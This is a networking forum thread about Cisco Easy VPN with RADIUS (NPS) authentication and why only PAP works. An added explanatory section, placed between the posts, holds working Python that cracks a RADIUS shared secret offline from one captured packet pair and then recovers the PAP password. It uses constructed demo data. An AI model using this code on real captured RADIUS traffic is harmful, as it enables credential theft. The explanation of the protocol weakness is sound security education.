timmi
7 posts

Hello everybody,

I want to get an Easy VPN (SDM) implementation running with IKE XAUTH that contacts an external RADIUS server for authentication (a Win2k8 server running Network Policy Server (NPS); before Win2k8, NPS was called IAS). The only way the user authentication works is with PAP (cleartext username/password).

I've found a thread that describes this problem as well:

https://supportforums.cisco.com/message/3044412;jsessionid=58789B4147D83BCE32B09982EB425375.node0

But I don't have an ASA; I have a simple 2850 with a standard IOS where I can't execute the tunnel-group or password-management command described here:

http://www.cisco.com/en/US/docs/security/asa/asa80/command/reference/p.html#wp1879916

I want to use CHAP or MS-CHAP or MS-CHAPv2... anything... but not PAP!

How could I get it to work without an ASA IOS?

Hope anyone could help with this specific problem.

Greetings,

timmi

timmi
7 posts

Does nobody have an idea for this problem?

joshlowe
101 posts

I'm not sure that it's possible to use anything but PAP on the routers (unless you're doing PPP authentication). Have you considered setting up an encrypted tunnel between the router and the RADIUS server? Even if you're using PAP, the entire RADIUS packet would be encrypted anyway.

joshlowe
101 posts

Actually, now that I think about it a little more, RADIUS encrypts the passwords regardless of whether it's PAP, CHAP, MS-CHAPv2, etc. Unfortunately that's all it encrypts (whereas TACACS+ will encrypt the entire payload).

However, my previous comment about IPSec between the router and RADIUS still applies if you feel like the MD5 hash of the PAP password is not enough, or you want to encrypt the other (sometimes sensitive) information in the RADIUS packet.
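To make concrete what the "MD5 hash of the PAP password" in the reply above actually is, here is an added example (written for this page; it is not code from the thread, from Cisco or from Microsoft). RFC 2865 section 5.2 does not hash the password: it XORs the null-padded password with a keystream of MD5(shared secret || Request Authenticator), then MD5(shared secret || previous ciphertext block) for each further 16-byte block. The Request Authenticator travels in the clear, so anyone holding the shared secret inverts it exactly, and the shared secret itself can be attacked offline from one captured Access-Request/Access-Accept pair because the Response Authenticator is MD5(Code || ID || Length || RequestAuth || Attributes || Secret). The shared secret `radius123`, the password, the wordlist and the packet attributes below are all constructed for the demonstration; the username `timmi` is taken from the thread.

```python
import hashlib
import os
import struct

ACCESS_REQUEST = 1
ACCESS_ACCEPT = 2
USER_NAME = 1       # RFC 2865 attribute types
USER_PASSWORD = 2


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 section 5.2 User-Password hiding: null-pad to 16-byte blocks, then
    XOR each block with MD5(secret + previous block), seeded by the Request
    Authenticator. This is reversible obfuscation keyed by the shared secret,
    not a one-way hash of the password."""
    if len(request_auth) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    if not 1 <= len(password) <= 128:
        raise ValueError("RADIUS User-Password is 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), request_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += block
        prev = block            # chaining uses the ciphertext block
    return bytes(out)


def reveal_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password: regenerate the same keystream and strip padding."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden User-Password must be a non-empty multiple of 16 bytes")
    out, prev = bytearray(), request_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out += bytes(c ^ k for c, k in zip(block, keystream))
        prev = block
    return bytes(out).rstrip(b"\x00")


def response_authenticator(code: int, identifier: int, attributes: bytes,
                           request_auth: bytes, secret: bytes) -> bytes:
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, identifier, 20 + len(attributes))
    return hashlib.md5(header + request_auth + attributes + secret).digest()


def crack_shared_secret(code, identifier, attributes, request_auth, observed_auth, wordlist):
    """Offline dictionary attack on the shared secret from one captured reply.
    Everything except the secret is visible on the wire."""
    for candidate in wordlist:
        if response_authenticator(code, identifier, attributes, request_auth, candidate) == observed_auth:
            return candidate
    return None


def attribute(attr_type: int, value: bytes) -> bytes:
    """Encode one attribute as Type, Length, Value (RFC 2865 section 5)."""
    return struct.pack("!BB", attr_type, 2 + len(value)) + value


def demo_pap_capture(secret=b"radius123", password=b"S3cret!Pass",
                     wordlist=(b"password", b"cisco", b"radius123", b"changeme")):
    """Constructed capture: NAS sends a PAP Access-Request, server answers
    Access-Accept. An observer with both packets and a wordlist recovers the
    shared secret, then the cleartext password. Returns the password or None."""
    request_auth = os.urandom(16)                       # cleartext in the Access-Request
    identifier = 7
    request_attrs = attribute(USER_NAME, b"timmi") + \
        attribute(USER_PASSWORD, hide_password(password, secret, request_auth))
    accept_attrs = b""                                  # bare Access-Accept
    accept_auth = response_authenticator(ACCESS_ACCEPT, identifier, accept_attrs,
                                         request_auth, secret)

    # --- attacker side: packet bytes plus a wordlist only ---
    found = crack_shared_secret(ACCESS_ACCEPT, identifier, accept_attrs,
                                request_auth, accept_auth, wordlist)
    if found is None:
        return None
    pos, hidden_on_wire = 0, None
    while pos < len(request_attrs):                     # walk the TLVs for User-Password
        attr_t, attr_l = request_attrs[pos], request_attrs[pos + 1]
        if attr_t == USER_PASSWORD:
            hidden_on_wire = request_attrs[pos + 2:pos + attr_l]
        pos += attr_l
    return reveal_password(hidden_on_wire, found, request_auth)


if __name__ == "__main__":
    print(demo_pap_capture())
```

The strength of this scheme is therefore exactly the strength of the RADIUS shared secret: a guessable secret gives up every PAP password in a capture, which is why the earlier suggestion of an IPsec tunnel between the router and the RADIUS server (or at least a long random secret) matters more than which MD5-based attribute carries the credential.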

timmi
7 posts

It's just an MD5 hash of the password? I think that's not enough in today's times.

I'm really wondering if PAP would be the only way of authentication with a RADIUS server. Mhhhhh. :-\
